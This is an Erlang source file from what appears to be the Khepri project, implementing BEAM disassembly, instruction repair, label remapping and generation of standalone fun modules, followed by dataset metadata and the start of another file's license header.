%% First group: clauses repairing instructions that `beam_disasm' decoded in
%% a shape the compiler does not accept back; each clause recurses so the
%% fixed instruction goes through the second group.
pass1_process_instructions(
  [{bs_append, _, _, _, _, _, _, {field_flags, FF}, _} = Instruction0 | Rest],
  State,
  Result)
  when is_integer(FF) ->
    %% `beam_disasm' did not decode this instruction's field flags.
    Instruction = decode_field_flags(Instruction0, 8),
    pass1_process_instructions([Instruction | Rest], State, Result);
pass1_process_instructions(
  [{bs_init2, _, _, _, _, {field_flags, FF}, _} = Instruction0 | Rest],
  State,
  Result)
  when is_integer(FF) ->
    %% `beam_disasm' did not decode this instruction's field flags.
    Instruction = decode_field_flags(Instruction0, 6),
    pass1_process_instructions([Instruction | Rest], State, Result);
pass1_process_instructions(
  [{BsPutSomething, _, _, _, {field_flags, FF}, _} = Instruction0 | Rest],
  State,
  Result)
  when (BsPutSomething =:= bs_put_binary orelse
        BsPutSomething =:= bs_put_integer) andalso
       is_integer(FF) ->
    %% `beam_disasm' did not decode this instruction's field flags.
    Instruction = decode_field_flags(Instruction0, 5),
    pass1_process_instructions([Instruction | Rest], State, Result);
pass1_process_instructions(
  [{bs_start_match3, Fail, Bin, {u, Live}, Dst} | Rest],
  State,
  Result) ->
    %% `beam_disasm' did not decode this instruction correctly. We need to
    %% patch it to:
    %% 1. add `test' as the first element in the tuple,
    %% 2. swap `Bin' and `Live',
    %% 3. put `Bin' in a list and
    %% 4. store `Live' as an integer.
    Instruction = {test, bs_start_match3, Fail, Live, [Bin], Dst},
    pass1_process_instructions([Instruction | Rest], State, Result);
pass1_process_instructions(
  [{test, bs_get_integer2,
    Fail, [Ctx, Live, Size, Unit, {field_flags, FF} = FieldFlags0, Dst]}
   | Rest],
  State,
  Result) when is_integer(FF) ->
    %% `beam_disasm' did not decode this instruction correctly. We need to
    %% patch it to move `Live' before the list. We also need to decode field
    %% flags.
    FieldFlags = decode_field_flags(FieldFlags0),
    Instruction = {test, bs_get_integer2,
                   Fail, Live, [Ctx, Size, Unit, FieldFlags], Dst},
    pass1_process_instructions([Instruction | Rest], State, Result);
pass1_process_instructions(
  [{test, bs_match_string, Fail, [Ctx, Stride, String]} | Rest],
  State,
  Result) when is_binary(String) ->
    %% `beam_disasm' did not decode this instruction correctly. We need to
    %% patch it to put `String' inside a tuple.
    Instruction = {test, bs_match_string,
                   Fail, [Ctx, Stride, {string, String}]},
    pass1_process_instructions([Instruction | Rest], State, Result);
%% Second group: permission checks, call recording and label renumbering.
pass1_process_instructions(
  [{Call, Arity, {Module, Name, Arity}} = Instruction | Rest],
  State,
  Result)
  when Call =:= call orelse Call =:= call_only ->
    %% Local call: record it so the callee's code gets copied too.
    State1 = ensure_instruction_is_permitted(Instruction, State),
    State2 = pass1_process_call(Module, Name, Arity, State1),
    pass1_process_instructions(Rest, State2, [Instruction | Result]);
pass1_process_instructions(
  [{Call, Arity, {extfunc, Module, Name, Arity}} = Instruction | Rest],
  State,
  Result)
  when Call =:= call_ext orelse Call =:= call_ext_only ->
    %% External call: likewise recorded; pass 2 may turn it into a local call.
    State1 = ensure_instruction_is_permitted(Instruction, State),
    State2 = pass1_process_call(Module, Name, Arity, State1),
    pass1_process_instructions(Rest, State2, [Instruction | Result]);
pass1_process_instructions(
  [{call_last, Arity, {Module, Name, Arity}, _} = Instruction
   | Rest],
  State,
  Result) ->
    State1 = ensure_instruction_is_permitted(Instruction, State),
    State2 = pass1_process_call(Module, Name, Arity, State1),
    pass1_process_instructions(Rest, State2, [Instruction | Result]);
pass1_process_instructions(
  [{call_ext_last, Arity, {extfunc, Module, Name, Arity}, _} = Instruction
   | Rest],
  State,
  Result) ->
    State1 = ensure_instruction_is_permitted(Instruction, State),
    State2 = pass1_process_call(Module, Name, Arity, State1),
    pass1_process_instructions(Rest, State2, [Instruction | Result]);
pass1_process_instructions(
  [{label, OldLabel} | Rest],
  #state{mfa_in_progress = {Module, _, _},
         next_label = NewLabel,
         label_map = LabelMap} = State,
  Result) ->
    %% Renumber the label and remember the old->new mapping so branch
    %% targets can be rewritten in pass 2.
    Instruction = {label, NewLabel},
    LabelKey = {Module, OldLabel},
    ?assertNot(maps:is_key(LabelKey, LabelMap)),
    LabelMap1 = LabelMap#{LabelKey => NewLabel},
    State1 = State#state{next_label = NewLabel + 1,
                         label_map = LabelMap1},
    pass1_process_instructions(Rest, State1, [Instruction | Result]);
pass1_process_instructions(
  [{line, _} | Rest],
  State,
  Result) ->
    %% Drop this instruction.
    pass1_process_instructions(Rest, State, Result);
pass1_process_instructions(
  [{make_fun2, {Module, Name, Arity}, _, _, _} = Instruction | Rest],
  State,
  Result) ->
    %% Lambda creation: the implementation function must be copied as well.
    State1 = ensure_instruction_is_permitted(Instruction, State),
    State2 = pass1_process_call(Module, Name, Arity, State1),
    pass1_process_instructions(Rest, State2, [Instruction | Result]);
pass1_process_instructions(
  [{make_fun3, {Module, Name, Arity}, _, _, _, _} = Instruction | Rest],
  State,
  Result) ->
    State1 = ensure_instruction_is_permitted(Instruction, State),
    State2 = pass1_process_call(Module, Name, Arity, State1),
    pass1_process_instructions(Rest, State2, [Instruction | Result]);
pass1_process_instructions(
  [Instruction | Rest],
  State,
  Result) ->
    %% Any other instruction is kept as-is, after the permission check.
    State1 = ensure_instruction_is_permitted(Instruction, State),
    pass1_process_instructions(Rest, State1, [Instruction | Result]);
pass1_process_instructions(
  [],
  State,
  Result) ->
    {lists:reverse(Result), State}.
-spec pass1_process_call(Module, Name, Arity, State) -> State when
      Module :: module(),
      Name :: atom(),
      Arity :: arity(),
      State :: #state{}.

%% @private Records a call discovered while walking a function's code.
%%
%% Calls to be copied go into `calls' (drained by
%% `pass1_process_function/4'); every call the callback allowed or denied is
%% also tracked in `all_calls' for the `is_standalone_fun_still_needed'
%% callback. Self-recursion is ignored.
pass1_process_call(
  Module, Name, Arity,
  #state{mfa_in_progress = {Module, Name, Arity}} = State) ->
    State;
pass1_process_call(
  Module, Name, Arity,
  #state{mfa_in_progress = {FromModule, _, _},
         functions = Functions,
         calls = Calls,
         all_calls = AllCalls} = State) ->
    CallKey = {Module, Name, Arity},
    AllCalls1 = AllCalls#{CallKey => true},
    case should_process_function(Module, Name, Arity, FromModule, State) of
        {true, State1} ->
            case Functions of
                #{CallKey := _} ->
                    %% Already copied; it was necessarily added to
                    %% `all_calls' the first time it was encountered, so
                    %% nothing to record here.
                    State1;
                _ ->
                    Calls1 = Calls#{CallKey => true},
                    State1#state{calls = Calls1,
                                 all_calls = AllCalls1}
            end;
        {false, State1} ->
            %% Not copied, but still visible to the callbacks.
            State1#state{all_calls = AllCalls1}
    end.
-spec lookup_function(Module, Name, Arity, State) -> {Function, State} when
      Module :: module(),
      Name :: atom(),
      Arity :: non_neg_integer() | undefined,
      State :: #state{},
      Function :: #function{}.

%% @private Fetches the `#function{}' record (disassembled code) for an MFA.
lookup_function(
  erl_eval = Module, Name, _Arity,
  #state{fun_info = #{module := Module,
                      name := Name,
                      arity := Arity,
                      env := Env}} = State) ->
    %% There is a special case for `erl_eval' local functions: they are
    %% lambdas dynamically parsed, compiled and loaded by `erl_eval' and
    %% appear as local functions inside `erl_eval' directly.
    %%
    %% However `erl_eval' module doesn't contain the assembly for those
    %% functions. Instead, the abstract form of the source code is available
    %% in the lambda's env.
    %%
    %% Here, we compile the abstract form and extract the assembly from
    %% the compiled beam. This allows to use the rest of `khepri_fun'
    %% unmodified.
    %%
    %% Note: the `Arity' used below is bound from `fun_info', not from the
    %% (ignored) `_Arity' argument.
    #beam_file{code = Code} = erl_eval_fun_to_asm(Module, Name, Arity, Env),
    {lookup_function1(Code, Name, Arity), State};
lookup_function(Module, Name, Arity, State) ->
    {#beam_file{code = Code}, State1} = disassemble_module(Module, State),
    {lookup_function1(Code, Name, Arity), State1}.
%% @private Scans a disassembled module's function list for `Name'/`Arity'.
%%
%% When the arity is `undefined', the first function with a matching name
%% wins. Crashes with `function_clause' if no function matches.
lookup_function1(
  [#function{name = Name, arity = Arity} = Found | _],
  Name, Arity) when is_integer(Arity) ->
    Found;
lookup_function1(
  [#function{name = Name} = Found | _],
  Name, undefined) ->
    Found;
lookup_function1([_ | Remaining], Name, Arity) ->
    lookup_function1(Remaining, Name, Arity).
-spec erl_eval_fun_to_asm(Module, Name, Arity, Env) -> BeamFileRecord when
      Module :: module(),
      Name :: atom(),
      Arity :: arity(),
      Env :: any(),
      BeamFileRecord :: #beam_file{}.
%% @private Builds a disassembled module out of an `erl_eval' lambda's
%% abstract code.
%%
%% The lambda's `env' carries its parsed clauses; we wrap them in a minimal
%% module, compile it to a beam binary and disassemble that binary.
erl_eval_fun_to_asm(Module, Name, Arity, [{Bindings, _, _, Clauses}])
  when Bindings =:= [] orelse %% Erlang is using a list for bindings,
       Bindings =:= #{} ->    %% but Elixir is using a map.
    %% We construct an abstract form based on the `env' of the lambda loaded
    %% by `erl_eval'.
    Anno = erl_anno:from_term(1),
    Forms = [{attribute, Anno, module, Module},
             {attribute, Anno, export, [{Name, Arity}]},
             {function, Anno, Name, Arity, Clauses}],
    %% The abstract form is now compiled to binary code. Then, the assembly
    %% code is extracted from the compiled beam.
    CompilerOptions = [from_abstr,
                       binary,
                       return_errors,
                       return_warnings,
                       deterministic],
    case compile:forms(Forms, CompilerOptions) of
        {ok, Module, Beam, _Warnings} ->
            %% We can ignore warnings because the lambda was already parsed
            %% and compiled before by `erl_eval' previously.
            do_disassemble(Beam);
        Error ->
            throw({erl_eval_fun_compilation_failure, Error})
    end.
-spec disassemble_module(Module, State) -> {BeamFileRecord, State} when
      Module :: module(),
      State :: #state{},
      BeamFileRecord :: #beam_file{}.

%% Key under which disassembled modules are cached in `persistent_term'.
-define(ASM_CACHE_KEY(Module, Checksum),
        {?MODULE, asm_cache, Module, Checksum}).

%% @private Returns the disassembled form of `Module', tracking checksums.
%%
%% If a checksum was already recorded for this module, the disassembled code
%% must match it (the `{BeamFileRecord, Checksum}' match asserts this);
%% otherwise the freshly computed checksum is stored in the state.
disassemble_module(Module, #state{checksums = Checksums} = State) ->
    case Checksums of
        #{Module := Checksum} ->
            {BeamFileRecord, Checksum} = disassemble_module1(
                                           Module, Checksum),
            {BeamFileRecord, State};
        _ ->
            {BeamFileRecord, Checksum} = disassemble_module1(
                                           Module, undefined),
            ?assert(is_binary(Checksum)),
            Checksums1 = Checksums#{Module => Checksum},
            State1 = State#state{checksums = Checksums1},
            {BeamFileRecord, State1}
    end.
%% @private Disassembles a module, going through the `persistent_term' cache.
%%
%% With a known checksum, a cached entry for that exact checksum is reused;
%% on a cache miss the module's object code is fetched and its MD5 must match
%% the expected checksum, otherwise the extraction is aborted. Without a
%% checksum, the module is fetched and its MD5 becomes the checksum.
disassemble_module1(Module, Checksum) when is_binary(Checksum) ->
    Key = ?ASM_CACHE_KEY(Module, Checksum),
    case persistent_term:get(Key, undefined) of
        #beam_file{} = BeamFileRecord ->
            {BeamFileRecord, Checksum};
        undefined ->
            {Module, Beam, _} = get_object_code(Module),
            {ok, {Module, ActualChecksum}} = beam_lib:md5(Beam),
            case ActualChecksum of
                Checksum ->
                    BeamFileRecord = do_disassemble_and_cache(
                                       Module, Checksum, Beam),
                    {BeamFileRecord, Checksum};
                _ ->
                    %% The module on disk differs from the one the fun was
                    %% built against; copying it would be unsafe.
                    throw(
                      {mismatching_module_checksum,
                       Module, Checksum, ActualChecksum})
            end
    end;
disassemble_module1(Module, undefined) ->
    {Module, Beam, _} = get_object_code(Module),
    {ok, {Module, Checksum}} = beam_lib:md5(Beam),
    BeamFileRecord = do_disassemble_and_cache(Module, Checksum, Beam),
    {BeamFileRecord, Checksum}.
%% @private Fetches a module's object code, throwing if it is unavailable.
get_object_code(Module) ->
    case code:get_object_code(Module) of
        error ->
            throw({module_not_found, Module});
        {Module, _Beam, _Filename} = Found ->
            Found
    end.
%% @private Disassembles a beam binary and caches the result.
%%
%% The cache key includes the checksum, so several versions of the same
%% module can coexist in `persistent_term'.
do_disassemble_and_cache(Module, Checksum, Beam) ->
    BeamFileRecord = do_disassemble(Beam),
    persistent_term:put(?ASM_CACHE_KEY(Module, Checksum), BeamFileRecord),
    BeamFileRecord.
%% @private Disassembles a beam binary into a `#beam_file{}' record.
do_disassemble(Beam) ->
    beam_disasm:file(Beam).
%% The field flags, which correspond to `Var/signed', `Var/unsigned',
%% `Var/little', `Var/big' and `Var/native' in the bitstring syntax, need to
%% be decoded here. It's the opposite to:
%% https://github.com/erlang/otp/blob/OTP-24.2/lib/compiler/src/beam_asm.erl#L486-L493
%%
%% The field flags bit field becomes a sublist of [signed, little, native].
%% @private Decodes the field-flags element at position `Pos' of an
%% instruction tuple, in place.
decode_field_flags(Instruction, Pos) when is_tuple(Instruction) ->
    Decoded = decode_field_flags(element(Pos, Instruction)),
    setelement(Pos, Instruction, Decoded).
-spec decode_field_flags(FieldFlagsBitFieldsTuple | FieldFlagsBitField) ->
    FieldFlagsTuple | FieldFlags when
      FieldFlagsBitFieldsTuple :: {field_flags, FieldFlagsBitField},
      FieldFlagsBitField :: non_neg_integer(),
      FieldFlagsTuple :: {field_flags, FieldFlags},
      FieldFlags :: [FieldFlag],
      FieldFlag :: little | signed | native.

%% @private Expands a field-flags bit field into its list-of-atoms form.
%%
%% Accepts either the bare integer or a `{field_flags, Integer}' wrapper and
%% returns the same shape with the integer replaced by a sublist of
%% `[signed, little, native]' (in that order).
decode_field_flags(0) ->
    [];
decode_field_flags(BitField) when is_integer(BitField) ->
    [Flag || {Flag, Mask} <- [{signed, 16#04},
                              {little, 16#02},
                              {native, 16#10}],
             BitField band Mask =:= Mask];
decode_field_flags({field_flags, BitField}) ->
    {field_flags, decode_field_flags(BitField)}.
-spec ensure_instruction_is_permitted(Instruction, State) ->
    State when
      Instruction :: beam_instr(),
      State :: #state{}.

%% @private Runs the caller-provided instruction filter, if any.
%%
%% A `throw' from the callback is recorded as an error (appended so the
%% encounter order is kept) instead of aborting immediately; errors are
%% reported later by `process_errors/1'.
ensure_instruction_is_permitted(
  Instruction,
  #state{options = #{ensure_instruction_is_permitted := Check},
         errors = Errors} = State)
  when is_function(Check) ->
    try
        Check(Instruction),
        State
    catch
        throw:Reason ->
            State#state{errors = Errors ++ [Reason]}
    end;
ensure_instruction_is_permitted(_Instruction, State) ->
    State.
-spec should_process_function(Module, Name, Arity, FromModule, State) ->
    {ShouldProcess, State} when
      Module :: module(),
      Name :: atom(),
      Arity :: arity(),
      FromModule :: module(),
      State :: #state{},
      ShouldProcess :: boolean().

%% @private Decides whether a function's code should be copied.
%%
%% The decision is delegated to the `should_process_function' callback when
%% one is configured; a `throw' from the callback is recorded as an error and
%% treated as "do not process". Without a callback, everything except the
%% `erlang' module is processed (see
%% `default_should_process_function/3').
should_process_function(
  erl_eval, Name, Arity, _FromModule,
  #state{fun_info = #{module := erl_eval,
                      name := Name,
                      arity := Arity,
                      type := local}} = State) ->
    %% We want to process lambdas loaded by `erl_eval'
    %% even though we wouldn't do that with the
    %% regular `erl_eval' API.
    {true, State};
should_process_function(
  Module, Name, Arity, FromModule,
  #state{options = #{should_process_function := Callback},
         errors = Errors} = State)
  when is_function(Callback) ->
    try
        ShouldProcess = Callback(Module, Name, Arity, FromModule),
        {ShouldProcess, State}
    catch
        throw:Error ->
            Errors1 = Errors ++ [Error],
            State1 = State#state{errors = Errors1},
            {false, State1}
    end;
should_process_function(Module, Name, Arity, _FromModule, State) ->
    {default_should_process_function(Module, Name, Arity),
     State}.
%% @private Default policy: copy everything except `erlang' BIF wrappers.
default_should_process_function(Module, _Name, _Arity) ->
    Module =/= erlang.
-spec is_standalone_fun_still_needed(State) -> IsNeeded when
      State :: #state{},
      IsNeeded :: boolean().

%% @private Asks the caller whether the standalone fun is still wanted.
%%
%% The callback receives every call seen during extraction plus all recorded
%% errors. Without a callback, the fun is always considered needed.
is_standalone_fun_still_needed(
  #state{options = #{is_standalone_fun_still_needed := IsNeededFun},
         all_calls = AllCalls,
         errors = Errors})
  when is_function(IsNeededFun) ->
    IsNeededFun(#{calls => AllCalls,
                  errors => Errors});
is_standalone_fun_still_needed(_State) ->
    true.
-spec process_errors(State) -> ok | no_return() when
      State :: #state{}.
%% @private Throws the first recorded error, or returns `ok' when there are
%% none.
%% TODO: Return all errors?
process_errors(#state{errors = Errors}) ->
    case Errors of
        [] -> ok;
        [FirstError | _] -> throw(FirstError)
    end.
%% -------------------------------------------------------------------
%% Code processing [Pass 2]
%% -------------------------------------------------------------------
-spec pass2(State) -> Asm when
      State :: #state{},
      Asm :: asm().

%% @private Pass 2: assembles all copied functions into a single module form.
pass2(
  #state{functions = Functions,
         next_label = NextLabel} = State) ->
    %% The module name is based on a hash of its entire code.
    GeneratedModuleName = gen_module_name(Functions, State),
    State1 = State#state{generated_module_name = GeneratedModuleName},
    Functions1 = pass2_process_functions(Functions, State1),
    %% Sort functions by their entrypoint label. The entrypoint was processed
    %% first in pass 1 and thus got the lowest labels, so it ends up first.
    Functions2 = lists:sort(
                   fun(#function{entry = EntryA},
                       #function{entry = EntryB}) ->
                           EntryA < EntryB
                   end, maps:values(Functions1)),
    %% The first function (the lambda) is the only one exported.
    [#function{name = Name, arity = Arity} | _] = Functions2,
    Exports = [{Name, Arity}],
    Attributes = [],
    Labels = NextLabel,
    {GeneratedModuleName,
     Exports,
     Attributes,
     Functions2,
     Labels}.
-spec pass2_process_functions(Functions, State) -> Functions when
      Functions :: #{mfa() => #function{}},
      State :: #state{}.

%% @private Applies the pass-2 rewrite to every copied function.
pass2_process_functions(Functions, State) ->
    Rewrite = fun(MFA, Function) ->
                      pass2_process_function(MFA, Function, State)
              end,
    maps:map(Rewrite, Functions).
-spec pass2_process_function(MFA, Function, State) -> Function when
      MFA :: mfa(),
      Function :: #function{},
      State :: #state{}.

%% @private Renames one function and rewrites each of its instructions.
%%
%% Fix: the per-instruction state (`mfa_in_progress' +
%% `function_in_progress') is loop-invariant, so it is now built once before
%% iterating instead of being rebuilt for every single instruction inside the
%% map function.
pass2_process_function(
  {Module, Name, Arity},
  #function{name = Name,
            code = Instructions} = Function,
  State) ->
    Name1 = gen_function_name(Module, Name, Arity, State),
    State1 = State#state{mfa_in_progress = {Module, Name, Arity},
                         function_in_progress = Name1},
    Instructions1 = [pass2_process_instruction(Instruction, State1)
                     || Instruction <- Instructions],
    Function#function{name = Name1,
                      code = Instructions1}.
-spec pass2_process_instruction(Instruction, State) -> Instruction when
      Instruction :: beam_instr(),
      State :: #state{}.

%% @private Rewrites a single instruction for the generated module.
%%
%% Calls to functions that were copied are redirected to their new entry
%% labels (external calls become local ones); every branch target is remapped
%% through the label map built in pass 1; `func_info' is updated with the
%% generated module and function names. Anything else is left untouched.
pass2_process_instruction(
  {Call, Arity, {_, _, _} = MFA} = Instruction,
  #state{functions = Functions})
  when Call =:= call orelse Call =:= call_only ->
    %% Local call: point to the callee's new entry label if it was copied.
    case Functions of
        #{MFA := #function{entry = EntryLabel}} ->
            {Call, Arity, {f, EntryLabel}};
        _ ->
            Instruction
    end;
pass2_process_instruction(
  {Call, Arity, {extfunc, Module, Name, Arity}} = Instruction,
  #state{functions = Functions})
  when Call =:= call_ext orelse Call =:= call_ext_only ->
    %% External call to a copied function: turn it into a local call.
    MFA = {Module, Name, Arity},
    case Functions of
        #{MFA := #function{entry = EntryLabel}} ->
            Call1 = case Call of
                        call_ext -> call;
                        call_ext_only -> call_only
                    end,
            {Call1, Arity, {f, EntryLabel}};
        _ ->
            Instruction
    end;
pass2_process_instruction(
  {bs_add, _, _, _} = Instruction, State) ->
    replace_label(Instruction, 2, State);
pass2_process_instruction(
  {bs_append, _, _, _, _, _, _, _, _} = Instruction, State) ->
    replace_label(Instruction, 2, State);
pass2_process_instruction(
  {bs_init2, _, _, _, _, _, _} = Instruction, State) ->
    replace_label(Instruction, 2, State);
pass2_process_instruction(
  {BsPutSomething, _, _, _, _, _} = Instruction, State)
  when BsPutSomething =:= bs_put_binary orelse
       BsPutSomething =:= bs_put_integer ->
    replace_label(Instruction, 2, State);
pass2_process_instruction(
  {call_last, Arity, {Module, Name, Arity}, Opaque} = Instruction,
  #state{functions = Functions}) ->
    MFA = {Module, Name, Arity},
    case Functions of
        #{MFA := #function{entry = EntryLabel}} ->
            {call_last, Arity, {f, EntryLabel}, Opaque};
        _ ->
            Instruction
    end;
pass2_process_instruction(
  {call_ext_last, Arity, {extfunc, Module, Name, Arity}, Opaque} = Instruction,
  #state{functions = Functions}) ->
    %% Same as `call_last' above; note the external tail call also becomes a
    %% local `call_last' when the callee was copied.
    MFA = {Module, Name, Arity},
    case Functions of
        #{MFA := #function{entry = EntryLabel}} ->
            {call_last, Arity, {f, EntryLabel}, Opaque};
        _ ->
            Instruction
    end;
pass2_process_instruction(
  {'catch', _, _} = Instruction, State) ->
    replace_label(Instruction, 3, State);
pass2_process_instruction(
  {func_info, _ModRepr, _NameRepr, Arity},
  #state{generated_module_name = GeneratedModuleName,
         function_in_progress = Name}) ->
    %% Rewrite the module/function names baked into error reports.
    ModRepr = {atom, GeneratedModuleName},
    NameRepr = {atom, Name},
    {func_info, ModRepr, NameRepr, Arity};
pass2_process_instruction(
  {get_map_elements, _, _, _} = Instruction, State) ->
    replace_label(Instruction, 2, State);
pass2_process_instruction(
  {jump, _} = Instruction, State) ->
    replace_label(Instruction, 2, State);
pass2_process_instruction(
  {loop_rec, _, _} = Instruction, State) ->
    replace_label(Instruction, 2, State);
pass2_process_instruction(
  {select_val, _, _, {list, Cases}} = Instruction,
  #state{mfa_in_progress = {Module, _, _},
         label_map = LabelMap} = State) ->
    %% Remap both the fail label and every branch target in the case list.
    Cases1 = [case Case of
                  {f, OldLabel} ->
                      NewLabel = maps:get({Module, OldLabel}, LabelMap),
                      {f, NewLabel};
                  _ ->
                      Case
              end || Case <- Cases],
    Instruction1 = replace_label(Instruction, 3, State),
    setelement(4, Instruction1, {list, Cases1});
pass2_process_instruction(
  {test, _, _, _} = Instruction, State) ->
    replace_label(Instruction, 3, State);
pass2_process_instruction(
  {test, _, _, _, _} = Instruction, State) ->
    replace_label(Instruction, 3, State);
pass2_process_instruction(
  {test, _, _, _, _, _} = Instruction, State) ->
    replace_label(Instruction, 3, State);
pass2_process_instruction(
  {make_fun2, {_, _, _} = MFA, _, _, _} = Instruction,
  #state{functions = Functions}) ->
    %% Point the lambda's implementation at its copied entry label.
    case Functions of
        #{MFA := #function{entry = EntryLabel}} ->
            setelement(2, Instruction, {f, EntryLabel});
        _ ->
            Instruction
    end;
pass2_process_instruction(
  {make_fun3, {_, _, _} = MFA, _, _, _, _} = Instruction,
  #state{functions = Functions}) ->
    case Functions of
        #{MFA := #function{entry = EntryLabel}} ->
            setelement(2, Instruction, {f, EntryLabel});
        _ ->
            Instruction
    end;
pass2_process_instruction(
  {'try', _, _} = Instruction, State) ->
    replace_label(Instruction, 3, State);
pass2_process_instruction(
  {wait_timeout, _, _} = Instruction, State) ->
    replace_label(Instruction, 2, State);
pass2_process_instruction(
  Instruction,
  _State) ->
    Instruction.
%% Remap the branch target stored at position Pos of Instruction, using
%% the label map built for the function currently being copied.
replace_label(Instruction, Pos,
              #state{mfa_in_progress = {Module, _, _},
                     label_map = LabelMap}) ->
    case element(Pos, Instruction) of
        {f, 0} ->
            %% The `0' label is an exception label in the compiler, used to
            %% trigger an exception when branching. It should remain unchanged
            %% here, for more information see:
            %% https://github.com/erlang/otp/blob/d955dc663a6d5dd03ab3360f9dd3dc0f439c7ef5/lib/compiler/src/beam_validator.erl#L26-L32
            Instruction;
        {f, OldLabel} ->
            NewLabel = maps:get({Module, OldLabel}, LabelMap),
            setelement(Pos, Instruction, {f, NewLabel})
    end.
-spec gen_module_name(Functions, State) -> Module when
      Functions :: #{mfa() => #function{}},
      State :: #state{},
      Module :: module().
%% Name of the generated module: "kfun__<Mod>__<Fun>__<Hash>". The hash
%% covers the extracted functions so different code yields different
%% module names.
gen_module_name(Functions, #state{fun_info = #{module := Mod, name := Name}}) ->
    Checksum = erlang:phash2(Functions),
    Formatted = io_lib:format("kfun__~s__~s__~b", [Mod, Name, Checksum]),
    list_to_atom(lists:flatten(Formatted)).
%% Chooses the name a copied function gets inside the generated module:
%% the entrypoint is stored as `run'; every other function gets a
%% "<module>__<name>" atom.
%%
%% Fix: the spec previously reused the type variable `Name' for both the
%% second argument and the return value, which wrongly suggested the
%% returned atom is the input name. The return value is now a distinct
%% `GeneratedName :: atom()' (it is `run' or a freshly built atom).
-spec gen_function_name(Module, Name, Arity, State) -> GeneratedName when
      Module :: module(),
      Name :: atom(),
      Arity :: arity(),
      State :: #state{},
      GeneratedName :: atom().

gen_function_name(
  Module, Name, Arity,
  #state{entrypoint = {Module, Name, Arity}}) ->
    run;
gen_function_name(
  Module, Name, _Arity,
  _State) ->
    InternalName = lists:flatten(
                     io_lib:format(
                       "~s__~s", [Module, Name])),
    list_to_atom(InternalName).
%% -------------------------------------------------------------------
%% Environment handling.
%% -------------------------------------------------------------------
-spec to_standalone_env(State) -> {StandaloneEnv, State} when
      State :: #state{},
      StandaloneEnv :: list().
%% Converts the captured environment of a fun to its standalone form.
%% The `is_standalone_fun_still_needed' option is hidden from the
%% recursive conversion and restored afterwards.
to_standalone_env(#state{fun_info = #{env := Env},
                         options = Options} = State) ->
    InnerOptions = maps:remove(is_standalone_fun_still_needed, Options),
    {Env1, State1} =
        to_standalone_arg(Env, State#state{options = InnerOptions}),
    {Env1, State1#state{options = Options}}.
%% Walks a term, replacing every fun by its standalone form while
%% threading the conversion state through. For lists the state flows
%% right-to-left (mapfoldr), exactly as the original foldr did.
to_standalone_arg(List, State) when is_list(List) ->
    lists:mapfoldr(fun to_standalone_arg/2, State, List);
to_standalone_arg(Tuple, State) when is_tuple(Tuple) ->
    {Elements, State1} = to_standalone_arg(tuple_to_list(Tuple), State),
    {list_to_tuple(Elements), State1};
to_standalone_arg(Map, State) when is_map(Map) ->
    maps:fold(
      fun(Key, Value, {Acc, StAcc0}) ->
              {Key1, StAcc1} = to_standalone_arg(Key, StAcc0),
              {Value1, StAcc2} = to_standalone_arg(Value, StAcc1),
              {Acc#{Key1 => Value1}, StAcc2}
      end, {#{}, State}, Map);
to_standalone_arg(Fun, State) when is_function(Fun) ->
    #state{options = Options,
           all_calls = AllCalls,
           errors = Errors} = State,
    {StandaloneFun, InnerState} = to_standalone_fun1(Fun, Options),
    #state{all_calls = InnerAllCalls,
           errors = InnerErrors} = InnerState,
    %% Merge what the inner conversion learned back into our state.
    State1 = State#state{all_calls = maps:merge(AllCalls, InnerAllCalls),
                         errors = Errors ++ InnerErrors},
    {StandaloneFun, State1};
to_standalone_arg(Term, State) ->
    {Term, State}.
%% Rebuilds real, callable terms from their standalone form: a
%% #standalone_fun{} becomes an actual fun of the same arity that
%% forwards its argument list to exec/2, and lists/tuples/maps are
%% walked recursively. Everything else passes through unchanged.
%%
%% Erlang funs have a fixed syntactic arity, so one clause per arity is
%% required; arities above 10 are unsupported and raise case_clause.
to_actual_arg(#standalone_fun{arity = Arity} = StandaloneFun) ->
    case Arity of
        0 ->
            fun() -> exec(StandaloneFun, []) end;
        1 ->
            fun(Arg1) -> exec(StandaloneFun, [Arg1]) end;
        2 ->
            fun(Arg1, Arg2) -> exec(StandaloneFun, [Arg1, Arg2]) end;
        3 ->
            fun(Arg1, Arg2, Arg3) ->
                    exec(StandaloneFun, [Arg1, Arg2, Arg3])
            end;
        4 ->
            fun(Arg1, Arg2, Arg3, Arg4) ->
                    exec(StandaloneFun, [Arg1, Arg2, Arg3, Arg4])
            end;
        5 ->
            fun(Arg1, Arg2, Arg3, Arg4, Arg5) ->
                    exec(StandaloneFun, [Arg1, Arg2, Arg3, Arg4, Arg5])
            end;
        6 ->
            fun(Arg1, Arg2, Arg3, Arg4, Arg5, Arg6) ->
                    exec(StandaloneFun, [Arg1, Arg2, Arg3, Arg4, Arg5, Arg6])
            end;
        7 ->
            fun(Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7) ->
                    exec(
                      StandaloneFun,
                      [Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7])
            end;
        8 ->
            fun(Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7, Arg8) ->
                    exec(
                      StandaloneFun,
                      [Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7, Arg8])
            end;
        9 ->
            fun(Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7, Arg8, Arg9) ->
                    exec(
                      StandaloneFun,
                      [Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7, Arg8, Arg9])
            end;
        10 ->
            fun(Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7, Arg8, Arg9, Arg10) ->
                    exec(
                      StandaloneFun,
                      [Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7, Arg8, Arg9,
                       Arg10])
            end
    end;
%% Containers are converted element by element.
to_actual_arg(List) when is_list(List) ->
    lists:map(
      fun(Item) ->
              to_actual_arg(Item)
      end, List);
to_actual_arg(Tuple) when is_tuple(Tuple) ->
    List0 = tuple_to_list(Tuple),
    List1 = to_actual_arg(List0),
    list_to_tuple(List1);
to_actual_arg(Map) when is_map(Map) ->
    maps:fold(
      fun(Key, Value, Acc) ->
              Key1 = to_actual_arg(Key),
              Value1 = to_actual_arg(Value),
              Acc#{Key1 => Value1}
      end, #{}, Map);
to_actual_arg(Term) ->
    Term. | src/khepri_fun.erl | 0.566498 | 0.461199 | khepri_fun.erl | starcoder |
% Licensed under the Apache License, Version 2.0 (the "License"); you may not
% use this file except in compliance with the License. You may obtain a copy of
% the License at
%
% http://www.apache.org/licenses/LICENSE-2.0
%
% Unless required by applicable law or agreed to in writing, software
% distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
